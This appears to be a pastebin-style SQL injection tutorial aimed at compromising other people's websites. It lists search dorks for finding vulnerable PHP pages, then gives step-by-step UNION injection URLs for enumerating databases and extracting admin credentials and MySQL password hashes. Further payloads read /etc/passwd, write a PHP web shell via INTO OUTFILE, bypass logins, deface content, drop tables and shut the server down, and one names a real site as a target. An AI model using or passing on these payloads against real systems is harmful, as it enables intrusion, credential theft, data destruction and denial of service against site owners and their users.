· 7 years ago · Oct 27, 2018, 02:20 AM
1MY SQL TUT
2
3
4Step - 1 ) Finding (maybe)vulnerable site (Dorks)
5
6
7inurl:trainers.php?id=
8inurl:buy.php?category=
9inurl:article.php?ID=
10inurl:play_old.php?id=
11inurl:declaration_more.php?decl_id=
12inurl:pageid=
13inurl:games.php?id=
14inurl:page.php?file=
15inurl:newsDetail.php?id=
16inurl:gallery.php?id=
17inurl:article.php?id=
18inurl:show.php?id=
19inurl:staff_id=
20inurl:newsitem.php?num=
21inurl:readnews.php?id=
22inurl:top10.php?cat=
23inurl:historialeer.php?num=
24inurl:reagir.php?num=
25inurl:Stray-Questions-View.php?num=
26inurl:forum_bds.php?num=
27inurl:game.php?id=
28inurl:view_product.php?id=
29inurl:newsone.php?id=
30inurl:sw_comment.php?id=
31inurl:news.php?id=
32inurl:avd_start.php?avd=
33inurl:event.php?id=
34inurl:product-item.php?id=
35inurl:sql.php?id=
36inurl:news_view.php?id=
37inurl:select_biblio.php?id=
38inurl:humor.php?id=
39inurl:aboutbook.php?id=
40inurl:ogl_inet.php?ogl_id=
41inurl:fiche_spectacle.php?id=
42inurl:communique_detail.php?id=
43inurl:sem.php3?id=
44inurl:kategorie.php4?id=
45inurl:news.php?id=
46inurl:index.php?id=
47inurl:faq2.php?id=
48inurl:show_an.php?id=
49inurl:preview.php?id=
50inurl:loadpsb.php?id=
51inurl:opinions.php?id=
52inurl:spr.php?id=
53inurl:pages.php?id=
54inurl:announce.php?id=
55inurl:clanek.php4?id=
56inurl:participant.php?id=
57inurl:download.php?id=
58inurl:main.php?id=
59inurl:review.php?id=
60inurl:chappies.php?id=
61inurl:read.php?id=
62inurl:prod_detail.php?id=
63inurl:viewphoto.php?id=
64inurl:article.php?id=
65inurl:person.php?id=
66inurl:productinfo.php?id=
67inurl:showimg.php?id=
68inurl:view.php?id=
69inurl:website.php?id=
70inurl:hosting_info.php?id=
71inurl:gallery.php?id=
72inurl:rub.php?idr=
73inurl:view_faq.php?id=
74inurl:artikelinfo.php?id=
75inurl:detail.php?ID=
76inurl:index.php?=
77inurl:profile_view.php?id=
78inurl:category.php?id=
79inurl:publications.php?id=
80inurl:fellows.php?id=
81inurl:downloads_info.php?id=
82inurl:prod_info.php?id=
83inurl:shop.php?do=part&id=
84inurl:productinfo.php?id=
85inurl:collectionitem.php?id=
86inurl:band_info.php?id=
87inurl:product.php?id=
88inurl:releases.php?id=
89inurl:ray.php?id=
90inurl:produit.php?id=
91inurl:pop.php?id=
92inurl:shopping.php?id=
93inurl:productdetail.php?id=
94inurl:post.php?id=
95inurl:viewshowdetail.php?id=
96inurl:clubpage.php?id=
97inurl:memberInfo.php?id=
98inurl:section.php?id=
99inurl:theme.php?id=
100inurl:page.php?id=
101inurl:shredder-categories.php?id=
102inurl:tradeCategory.php?id=
103inurl:product_ranges_view.php?ID=
104inurl:shop_category.php?id=
105inurl:transcript.php?id=
106inurl:channel_id=
107inurl:item_id=
108inurl:newsid=
109inurl:trainers.php?id=
110inurl:news-full.php?id=
111inurl:news_display.php?getid=
112inurl:index2.php?option=
113inurl:readnews.php?id=
114inurl:top10.php?cat=
115inurl:newsone.php?id=
116inurl:event.php?id=
117inurl:product-item.php?id=
118inurl:sql.php?id=
119inurl:aboutbook.php?id=
120inurl:preview.php?id=
121inurl:loadpsb.php?id=
122inurl:pages.php?id=
123inurl:material.php?id=
124inurl:clanek.php4?id=
125inurl:announce.php?id=
126inurl:chappies.php?id=
127inurl:read.php?id=
128inurl:viewapp.php?id=
129inurl:viewphoto.php?id=
130inurl:rub.php?idr=
131inurl:galeri_info.php?l=
132inurl:review.php?id=
133inurl:iniziativa.php?in=
134inurl:curriculum.php?id=
135inurl:labels.php?id=
136inurl:story.php?id=
137inurl:look.php?ID=
138inurl:newsone.php?id=
139inurl:aboutbook.php?id=
140inurl:material.php?id=
141inurl:opinions.php?id=
142inurl:announce.php?id=
143inurl:rub.php?idr=
144inurl:galeri_info.php?l=
145inurl:tekst.php?idt=
146inurl:newscat.php?id=
147inurl:newsticker_info.php?idn=
148inurl:rubrika.php?idr=
149inurl:rubp.php?idr=
150inurl:offer.php?idf=
151inurl:art.php?idm=
152inurl:title.php?id=
153buy.php?category=
154article.php?ID=
155play_old.php?id=
156declaration_more.php?decl_id=
157Pageid=
158games.php?id=
159page.php?file=
160newsDetail.php?id=
161gallery.php?id=
162article.php?id=
163play_old.php?id=
164show.php?id=
165staff_id=
166newsitem.php?num=
167readnews.php?id=
168top10.php?cat=
169historialeer.php?num=
170reagir.php?num=
171forum_bds.php?num=
172game.php?id=
173view_product.php?id=
174newsone.php?id=
175sw_comment.php?id=
176news.php?id=
177avd_start.php?avd=
178event.php?id=
179product-item.php?id=
180sql.php?id=
181news_view.php?id=
182select_biblio.php?id=
183humor.php?id=
184aboutbook.php?id=
185fiche_spectacle.php?id=
186communique_detail.php?id=
187sem.php3?id=
188kategorie.php4?id=
189faq2.php?id=
190show_an.php?id=
191preview.php?id=
192loadpsb.php?id=
193opinions.php?id=
194spr.php?id=
195pages.php?id=
196announce.php?id=
197clanek.php4?id=
198participant.php?id=
199download.php?id=
200main.php?id=
201review.php?id=
202chappies.php?id=
203read.php?id=
204prod_detail.php?id=
205viewphoto.php?id=
206article.php?id=
207play_old.php?id=
208declaration_more.php?decl_id=
209category.php?id=
210publications.php?id=
211fellows.php?id=
212downloads_info.php?id=
213prod_info.php?id=
214shop.php?do=part&id=
215Productinfo.php?id=
216website.php?id=
217Productinfo.php?id=
218showimg.php?id=
219view.php?id=
220rub.php?idr=
221view_faq.php?id=
222artikelinfo.php?id=
223detail.php?ID=
224collectionitem.php?id=
225band_info.php?id=
226product.php?id=
227releases.php?id=
228ray.php?id=
229produit.php?id=
230pop.php?id=
231shopping.php?id=
232productdetail.php?id=
233post.php?id=
234viewshowdetail.php?id=
235clubpage.php?id=
236memberInfo.php?id=
237section.php?id=
238theme.php?id=
239page.php?id=
240shredder-categories.php?id=
241tradeCategory.php?id=
242shop_category.php?id=
243transcript.php?id=
244channel_id=
245item_id=
246newsid=
247trainers.php?id=
248buy.php?category=
249article.php?ID=
250play_old.php?id=
251iniziativa.php?in=
252detail_new.php?id=
253tekst.php?idt=
254newscat.php?id=
255newsticker_info.php?idn=
256rubrika.php?idr=
257rubp.php?idr=
258offer.php?idf=
259hotel.php?id=
260art.php?idm=
261title.php?id=
262look.php?ID=
263story.php?id=
264labels.php?id=
265review.php?id=
266chappies.php?id=
267news-full.php?id=
268news_display.php?getid=
269index2.php?option=
270ages.php?id=
271"id=" & intext:"Warning: mysql_fetch_assoc()
272"id=" & intext:"Warning: mysql_fetch_array()
273"id=" & intext:"Warning: mysql_num_rows()
274"id=" & intext:"Warning: session_start()
275"id=" & intext:"Warning: getimagesize()
276"id=" & intext:"Warning: Unknown()
277"id=" & intext:"Warning: pg_exec()
278"id=" & intext:"Warning: array_merge()
279"id=" & intext:"Warning: mysql_result()
280"id=" & intext:"Warning: mysql_num_rows()
281"id=" & intext:"Warning: mysql_query()
282"id=" & intext:"Warning: filesize()
283"id=" & intext:"Warning: require()
284
285
286***********************************************************************************************************
287Assume site found = http://www.xxxxx.com/index.php?catid=1
288************************************************************************************************************
289Step -2 Testing if vulnerable
290
291
292Method 1 ) test with this
293
294 http://www.xxxxx.com/index.php?catid=1' (should retrun error page)
295 http://www.xxxxx.com/index.php?catid='1 (should retrun error page)
296
297 Method2 ) Test with this
298
299 http://ww.xxxxx.com/index.php?page=2-1
300
301 NOTE: if above both gives same error page then target is mostly vulnerable
302
303 In the case where you are to find a website such as this:
304
305Code:
306http://www.site.com/buy.php?id=1&dog;catid=2
307
308Then you must use the same technique with adding a ' except it must be between the value (in this case the number) and the operator (the "=" sign) so it looks like this:
309
310Code:
311http://www.site.com/buy.php?id='1&dog;catid='2
312
313 Magic Quotes prevents quotes from being used in injections by either making the ' (original quote) to \' (backslashed quote) or '' (double quote).
314
315http://site.com/script.php?id=1 or 1=1 /*
316
317 http://site.com/script.php?id=1 or '1'='1' --
318
319 http://site.com/script.php?id=1' or 1=1 --
320
321 ubsection 2.3 - Step 2)Check for magic quotes
322
323We know from our example before that magic quotes are off because we used ' to end the WHERE clause and it gave no error, but lets pretend our first try worked, http://site.com/script.php?id=1 or 1=1 --, so were not sure if ?€? causes an error or not. We need to know if magic quotes is on because if we want to use a function like load_file to steal files (discussed later), or choose data where the user = 'admin', we need to be able to use 's, so magic quotes MUST be off.
324
325To find out if theyre on, we would try:
326
327http://site.com/script.php?id=1 or '1'='1' --
328
329If you get an error like:
330
331"Error in MySQL Syntax by '\'1\'=\'1\''. in script.php on line 7."
332
333or
334
335"Error in MySQL Syntax by '''1''=''1'''. in script.php on line 7."
336
337then you would see that magic quotes are on since its adding \s or an extra ' to the ' you put in. Then you would not be able to steal files if load_file was enabled or choose certain data using WHERE ( there is a way to get around it which I will discuss later, but it doesnt work for load_file, just WHERE and other functions discussed later like concat)
338
339Now if you get no error, you know magic_quotes are off and you have an even bigger advantage. That was easy, wasn?€?t it? Now lets move on.
340
341 ************************************************************************************************************
342 Getting Number of Columns
343
344 Method 1)
345http://www.example.com/index.php?id=3 ORDER BY (number)--
346 OR
347http://www.tartanarmy.com/news/news.php?id=130 order by 3
348
349where 'number' goes from 1 to the num when u get error page
350
351
352
353http://www.example.com/index.php?id=3 order by 1--
354http://www.example.com/index.php?id=3 order by 2--
355http://www.example.com/index.php?id=3 order by 3--
356http://www.example.com/index.php?id=3 order by 4--
357http://www.example.com/index.php?id=3 order by 5--
358http://www.example.com/index.php?id=3 order by 6--
359http://www.example.com/index.php?id=3 order by 7--
360http://www.example.com/index.php?id=3 order by 8--
361
362Lets say on order by 8-- you get an error page. This means that the website has 7 columns because
363it will give you errors on anything over 7.
364
365************************************************************************************************************
366Finding Acsessable Columns
367
368http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--
369 OR
370http://www.example.com/index.php?id=3+UNION+SELECT+1,2,3,4,5,6,7--
371 OR
372http://www.example.com/index.php?id=-3 UNION SELECT 1,2,3,4,5,6,7--
373 OR
374 http://www.example.com/index.php?id=-3 UNION SELECT 1,2,3,4,5,6,7 /*
375 OR
376 http://www.site.com/news.php?id=5 union all select 1,2,3/*
377 OR
378http://www.site.ru/index.php?page=-1 union + + + select null, null / * (where nmber of "nulls' are num of columns" )
379 OR
380http://www.site.ru/index.php?page=99999 union + + + select null, null / *
381 OR
382http://www.so-and-so.com/gallery.php?id=-170 /*union*/ /*all*/ /*select*/ 1,2,3,4,5,6,7,8,9,10--
383
384where 7 is the lsat column we found in above process.
385with these we will see a fucked up page with ome numbers written on it like 2,3 ...2,5 whatver.these are column we can modify and extract data from
386
387
388
389************************************************************************************************************
390Finding MySQL Database Version
391
392on the column we found exploitable in above will be replaced by @@version or version()
393
394http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--
395
396http://www.site.com/buy.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--
397
398if we get <5 then we wil have to guess tablename and column , if >5 we can get it easily
399
400if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
401then what we need is convert() function
402
403http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
404
405or with hex() and unhex()
406
407http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
408
409http://site.com/script.php?id=1' and substr(@@version,1)>3 --
410************************************************************************************************************
411Finding Database Names
412
413http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--
414
415http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--
416
417
418************************************************************************************************************
419TIP- we can also find version , database by :-
420where test is assume table name. if then we get error msg with database name
421
422
423http://www.example.com/index.php?id=-3+UNION+SELECT+version,database(),3,4,5,6,7 FROM TEST--
424
425http://www.site.ru/index.php?page=-1 + union + +1.2 select, USER (), 4,5,6 / *
426
427http://www.site.ru/index.php?page=-1 + union + +1.2 select, VERSION (), 4,5,6 / *
428
429http://www.site.ru/index.php?page=-1 + union + +1.2 select, DATABASE (), 4,5,6 / *
430
431
432http://www.site.ru/index.php?page=-1 + union + +1.2 select, user, password, 5,6 mysql.user + from + / *
433
434http://www.site.ru/index.php?page=-1+ union + +1.2 select, name, passwd, 4,5,6 + + from users / *
435************************************************************************************************************
436Finding Table Names
437
438
439
440for version >5
441http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--
442 OR
443http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
444
445 Now we must add LIMIT to the end of query to list out all tables.
446
447http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
448
449note that i put 0,1 (get 1 result starting from the 0th)
450
451now to view the second table, we change limit 0,1 to limit 1,1
452
453http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
454
455the second table is displayed.
456
457http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
458
459See where it says tar_admin? Thats what we want. But how are we gonna get the info thats in there? Like this. *If you downloaded the hackbar, like I told you to, your gonna need it*
460Code:
461
462http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--
463
464http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name= tar_admin
465So, tar_admin is what we want to get into, but putting it just like that wont work. We need too convert it into CHAR (). The HackBar can do that. Highlight what you want to turn into CHAR () and click MySQL, then MYSQL CHAR ().
466Code:
467tar_admin = CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)
468
469So the whole thing is :
470Code:
471http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name= CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)
472
473********************************
474for version < 5 we have to guess table name
475common table names are: user/s, admin/s, member/s ...
476
477http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*
478
479(we see number 2 on the screen like before, and that's good :D) we know that table admin exists...
480
481
482************************************************************************************************************
483Finding Column Names
484
485for version > 5
486
487http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--
488 OR
489http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
490http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
491
492sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(x)--
493
494http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name= tar_admin
495
496http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--
497
498So, tar_admin is what we want to get into, but putting it just like that wont work. We need too convert it into CHAR (). The HackBar can do that. Highlight what you want to turn into CHAR () and click MySQL, then MYSQL CHAR ().
499Code:
500tar_admin = CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)
501
502So the whole thing is :
503Code:
504http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name= CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)
505
506*****************************************
507for version < 5
508
509common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
510
511
512http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
513
514we get username displayed on screen, example would be admin, or superadmin etc...
515
516now to check if column password exists
517
518http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)
519
520we seen password on the screen in hash or plain-text, it depends of how the database is set up :)
521
522when you have this, you can login like admin or some superuser :D
523
524************************************************************************************************************
525TIP:
526
527if can't guess the right table name, you can always try mysql.user (default)
528
529it has user i password columns, so example would be
530
531http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
532*****************************************
533
534if you wanna display column names for specific table use this query. (where clause)
535let's say that we found table users.
536
537http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
538
539Note that this won't work if the magic quotes is ON.
540
541let's say that we found colums user, pass and email.
542
543now to complete query to put them all together :D
544
545for that we use concat() , i decribe it earlier.
546
547http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
548
549************************************************************************************************************
550pull information
551
552http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--
553
554
555EX: http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--
556
557
558
559
560http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
561
562Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
563
564(there is another way for that, char(58), ascii value for : )
565
566
567 sqlivulnerablesite.com/index.php?id=1 union all select 1,concat(username),0x3a,(password),3,4,5,6,7,8,9 from --
568 **************************************************************************************************************************************************
569
5703) Read files on the server
571If we have the right file_priv we can read the files on the server
572check with the user to visualize which mysqld. To do so, we will help LOAD_FILE () function. Example:
573
574
575Code:
576
577http://www.site.ru/index.php?page=-1 + union + +1.2 select, LOAD_FILE ( '/ etc / passwd'), 4,5,6 / *
578
5794) Get a shell
580Immediately I say that for this we need to know the location checked-out site. Drawing up a request to file recordable shell. Let mouth. dirrektoriya "/ home / site / public_html /"
581Then, a query is:
582
583
584Code:
585
586http://www.site.ru/index.php?page=-1 + union + select +1,2,3,4,5, '<? php system ($ _GET [cmd]);>' + + + from mysql.user into outfile + + '/ home / site / public_html / shell.php' / *
587
588Here, indeed all of the major steps that can be done with MySQL Inj. All that I can add more, so that, for example, can be controlled number of outgoing HELPED table with the command limit.
589Syntax: limit shift, QTY
590Exapmle: union select 1.2, user, pass, from 5,6 + + + users limit +5.3 / * [/ i]
591As a result which will return to 3 entry, beginning with the fifth
592
593
594Secrets and the nuances
595filtering Workaround:
596For example, I sometimes met with the fact that variable with mysql inj filtered so that the expression, in the name field, I can not use the letters. This, I bypassed this way:
597
598
599
600Code:
601
602http://www.site.ru/index.php?page=-1 + union + +1.2 select, AES_DECRYPT (AES_ENCRYPT (USER (), 0x71), 0x71), 4,5,6 / *
603
604It worked successfully.
605
606
607
608http://www.site.ru/index.php?page=-1 + union + +1.2 select, LOAD_FILE (char (47101116,99,47112,97115115119100)), 4,5,6 / *
609
610
611http://www.site.ru/index.php?page=-1 + union + +1.2 select, user, password, 5,6 mysql.user + from + / *
612
613http://www.site.ru/index.php?page=-1/ ** / union / ** / select / ** / 1.2, user, password, 5.6 / ** / from / * * / mysql.user / *
614
615
616
617DOS
618
619http://www.site.ru/index.php?page=-1 + BENCHMARK (10000000, BENCHMARK (10000000 md
620
621other way
622
623http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
624http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
625
626http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename--
627
628where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess
629then once u have the right table name you should get the administrator password
630then just do the same thing but type username instead of password
631sometimes the password is hashed and you need to crack it.
632then see if you can get the admin panel if you cant then try the admin panel finder script here http://www.darkc0de.com/c0de/perl/admin_1.2_.txt
633now if the database is version 5 or up
634type
635http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
636and that will display a list of all the tables
637once you have your table name
638type the same thing as 4
639http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable--
640then the same with username
641 **********************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************
642
643
644 Tut 2
645
646 AT very weak site
647
648 with admin pages
649
650 "inurl:admin.asp"
651"inurl:login/admin.asp"
652"inurl:admin/login.asp"
653"inurl:adminlogin.asp"
654"inurl:adminhome.asp"
655"inurl:admin_login.asp"
656"inurl:administratorlogin.asp"
657"inurl:login/administrator.asp"
658"inurl:administrator_login.asp"
659
660so what we do here is in the username we always type "Admin"
661and for our password we type our sql injection
662
663here is a list of sql injections
664
665' or '1'='1
666' or 'x'='x
667' or 0=0 --
668" or 0=0 --
669or 0=0 --
670' or 0=0 #
671" or 0=0 #
672or 0=0 #
673' or 'x'='x
674" or "x"="x
675') or ('x'='x
676' or 1=1--
677" or 1=1--
678or 1=1--
679' or a=a--
680" or "a"="a
681') or ('a'='a
682") or ("a"="a
683hi" or "a"="a
684hi" or 1=1 --
685hi' or 1=1 --
686'or'1=1'
687
688
689 ****************************************************************************************************************************
690 example table names
691
692 archives,articles,articles2,digest,edition,events,links,nomination,sections,staf ?f,survey
693
694 example column name
695 id,date,title,by,abstract,body,section,keywords,photo,id,date,title,author,abstr?act,body,section,keywords,
696photo,caption,caption2,caption3,caption4,lead,id,date,title,author,abstract,body?,section,keywords,photo,
697caption,caption2,caption3,caption4,lead,id,date,title,city,body,id,volume,number?,date,id,title,body,
698month,day,year,date,time,time2,location,cost,contact,phone,email,url,approved,id?,url,title,category,
699description,id,date,nominator,nominatortitle,nominatorcompany,nominatoraddress,n?ominatorcity,
700nominatorstate,nominatorzip,nominatorphone,nominatorfax,nominatoremail,nomineeco?mpany,nomineeaddress,
701nomineecity,nomineestate,nomineezip,nomineephone,nomineefax,nomineeweb,reason,re?asonother,sat1,sat2,sat3,
702sat4,sat5,ethics1,ethics2,ethics3,ethics4,contrib1,contrib2,contrib3,contrib4,de?v1,dev2,dev3,dev4,dev5,
703dev6,dev7,dev8,dev9,lead1,lead2,lead3,lead4,lead5,lead6,quality1,quality2,contac?t1name,contact1title,
704contact1phone,contact1email,contact2name,contact2title,contact2phone,contact2ema?il,contact3name,
705contact3title,username, user, usr, user_name, password, pass, passwd, pwd
706
707 ****************************************************************************************************************************
708
709 ****************************************************************************************************************************
710
711
712 ********************************************************
713
714
715 CTD...
716MODIFYING SITE CONTENT:
717Sometime, u find the vulnerable site and get evrything to know but maybe admin login doesn't exist or it is accessible for certain IP range. Even in that context, u can use some kewl SQL commands for modifying the site content. I haven't seen much articles addressing this one so thought to include it here.
718Here, I will basically talk about few SQL commands u may use to change the site content. Therse commands are the workhorse of MySQL & are deadly when executed.
719First let me list these commands:
720UPDATE: It is used to edit infos already in the db without deleting any rows.
721DELETE: It is used to delete the contents of one or more fields.
722DROP: It is used completely delete a table & all its associated data.
723Now, u could have figured out that these commands can be very desctructive if the site lets us to interact with db with no sanitization & proper permission.
724Command Usage:
725UPDATE: Our vulnerable page is:
726http://www.site.com/article.php?id=5
727Lets say the query is:
728SELECT title,data,author FROM article WHERE id=5
729Though in reality, we don't know the query as above, we can find the table and column name as discussed earlier.
730So we would do:
731www.site.com/article.php?id=5 UPDATE article SET title='Hacked By PinningYou'/*
732or, u could alternatively do:
733www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY PinningYou',data='Ur site has zero
734security',author='sam207'/*
735
736By executing first query, we have set the title value as 'Hacked By sam207' in the table article while in second query, we have updated all three fields title, data, & author in the table article.
737Sometimes, u may want to change the specific page with id=5. For this u will do:
738www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*
739
740DELETE:As already stated, this deletes the content of one or more fields permanently from the db server.
741The syntax is:
742www.site.com/article.php?id=5 DELETE title,data,author FROM article/*
743or if u want to delete these fields from the id=5, u will do:
744www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/*
745
746DROP:This is another deadly command u can use. With this, u can delete a table & all its associated data.
747For this, we make our URL as:
748www.site.com/article.php?id=5 DROP TABLE article/*
749This would delete table article & all its contents.
750
751Finally, I want to say little about ;
752Though I have not used this in my tutorial, u can use it to end ur first query and start another one.
753This ; can be kept at the end of our first query so that we can start new query after it.
754CTD...
755SHUTTING DOWN MySQL SERVER:
756This is like DoSing the server as it will make the MySQL resources unavailable for the legitimate users or site visitors... For this, you will be using: SHUTDOWN WITH NOWAIT;
757So, you would craft a query which would execute the above command...
758For example, in my case, I would do the following:
759www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT;
760WOW! the MySQL server is down... This would prevent legitimate users & site visitors from using or viewing MySQL resources...
761
762LOADFILE:
763MySQL has a function called load_file which you can use for your benefits again.. I have not seen much site where I could use this function... I think we should have MySQL root privilege for this.... Also, the magic quotes should be off for this.. But there is a way to get past the magic quotes... load_file can be used to load certain files of the server such as .htaccess, .htpasswd, etc.. & also password files like etc/passwd, etc..
764Do something like below:
765www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/*
766
767But sometimes, you will have to hex the part & do something like below:
768www.site.com/article.php?id=5 UNION ALL SELECT load_file(0x272F6574632F70617373776427)
769where I have hexed... Now, if we are lucky, the scriptblock would echo the etc/passwd in the result..
770
771MySQL ROOT:
772If the MySQL version is 5 or above, we might be able to gain MySQL root privilege which will again be helpful for us.. MySQL servers from version 5 have a table called mysql.user which contains the hashes & usernames for login... It is in the user table of the mysql database which ships with every installation of MySQL..
773For this, you will do:
774www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/*
775
776Now you will get the usernames & hashes.. The hash is mysqlsha1... Quick note: JTR won't crack it.. But http://www.insidepro.com has one to do it..
777CTD...
778FINALIZING THE INJECTION TUTORIAL:
779I know I have missed some things like outfile, WHERE clause, blind injection,etc... If I get time, I would try to update the tutorial with these.. Also for all sql injectors, think in a broad way.. & hexing is an important part in sql injection.. Sometimes the things that can't be done with normal ways can be done by using the hex part.. & be sure to try things with char(), hex() functions.. With these, you can bypass magic quotes on the server.. Again, within the UNION statement, you may try to use the XSS which would be sometimes helpful for you..
780www.site.com/article.php?id=5 UNION ALL SELECT <scblockedript>alert("XSS via SQL injection");</scblockedript>,2/*
781Again in the above injection, you may require to hex up the javascriptblock part for bypassing the magic quotes..
782Also for starters & those who know little things, you may setup a MySQL server & configure PHP for your apache server in your localhost where you can try different things..
783In the command line interface of MySQL, try various commands enlisted below.. Try by modifying them... This would help you improve your MySQL command knowledge.. Also try to see how PHP codes interact with MySQL server.. For example, install some free forums like PHPBB, SMF,etc.. or some content management system as it would help you in two ways.. First, you would learn how the PHP interacts with MySQL.. You may check MySQL folder with what changes has occured after installing them.. What would happen if I do this? or that?? etc..etc.. Second, you may be able to find bugs in them.. like rfi in some part of the code or sql injection in another part or maybe csrf injection,etc.. That would help you to learn new things because you all know practice makes the man perfect...
784CTD
785MAJOR MySQL COMMANDS:
786Below, I would list some major MySQL commands that might help you a lot... Play with them in different ways by setting up a MySQL server in your computer..
787All the commands here are copy pasted from the post at http://www.h4cky0u.org & the credit for this part goes to the original author.. This is the only part which I didn't write myself.. I could have but since there is better one, I thought to put the same part here.. Thanks to whoever posted this in h4cky0u site.. & also full credits to him/her for this part..
788ABORT -- abort the current transaction
789ALTER DATABASE -- change a database
790ALTER GROUP -- add users to a group or remove users from a group
791ALTER TABLE -- change the definition of a table
792ALTER TRIGGER -- change the definition of a trigger
793ALTER USER -- change a database user account
794ANALYZE -- collect statistics about a database
795BEGIN -- start a transaction block
796CHECKPOINT -- force a transaction log checkpoint
797CLOSE -- close a cursor
798CLUSTER -- cluster a table according to an index
799COMMENT -- define or change the comment of an object
800COMMIT -- commit the current transaction
801COPY -- copy data between files and tables
802CREATE AGGREGATE -- define a new aggregate function
803CREATE CAST -- define a user-defined cast
804CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
805CREATE CONVERSION -- define a user-defined conversion
806CREATE DATABASE -- create a new database
807CREATE DOMAIN -- define a new domain
808CREATE FUNCTION -- define a new function
809CREATE GROUP -- define a new user group
810CREATE INDEX -- define a new index
811CREATE LANGUAGE -- define a new procedural language
812CREATE OPERATOR -- define a new operator
813CREATE OPERATOR CLASS -- define a new operator class for indexes
814CREATE RULE -- define a new rewrite rule
815CREATE SCHEMA -- define a new schema
816CREATE SEQUENCE -- define a new sequence generator
817CREATE TABLE -- define a new table
818CREATE TABLE AS -- create a new table from the results of a query
819CREATE TRIGGER -- define a new trigger
820CREATE TYPE -- define a new data type
821CREATE USER -- define a new database user account
822CREATE VIEW -- define a new view
823DEALLOCATE -- remove a prepared query
824DECLARE -- define a cursor
825DELETE -- delete rows of a table
826DROP AGGREGATE -- remove a user-defined aggregate function
827DROP CAST -- remove a user-defined cast
828DROP CONVERSION -- remove a user-defined conversion
829DROP DATABASE -- remove a database
830DROP DOMAIN -- remove a user-defined domain
831DROP FUNCTION -- remove a user-defined function
832DROP GROUP -- remove a user group
833DROP INDEX -- remove an index
834DROP LANGUAGE -- remove a user-defined procedural language
835DROP OPERATOR -- remove a user-defined operator
836DROP OPERATOR CLASS -- remove a user-defined operator class
837DROP RULE -- remove a rewrite rule
838DROP SCHEMA -- remove a schema
839DROP SEQUENCE -- remove a sequence
840DROP TABLE -- remove a table
841DROP TRIGGER -- remove a trigger
842DROP TYPE -- remove a user-defined data type
843DROP USER -- remove a database user account
844DROP VIEW -- remove a view
845END -- commit the current transaction
846EXECUTE -- execute a prepared query
